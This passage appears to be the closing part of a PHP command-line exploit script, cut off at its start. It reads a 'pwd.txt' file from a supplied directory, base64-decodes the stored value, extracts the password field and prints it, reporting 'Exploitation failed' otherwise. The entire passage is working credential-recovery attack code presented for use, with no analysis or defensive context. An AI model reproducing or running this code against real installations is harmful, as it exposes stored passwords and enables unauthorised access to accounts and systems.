\r\n\r\n", $argv[0]) and exit; $out = (preg_match('!^([^ ]+)$!sei', file_get_contents($argv[1] . '/pwd.txt'), $r) && preg_match('!^([^\|\|]+)\|\|!sei', base64_decode($r[1]), $pass)) ? sprintf("Password : %s", base64_decode($pass[1])) : 'Exploitation failed'; printf("[~] %s \r\n\r\n", $out); ?>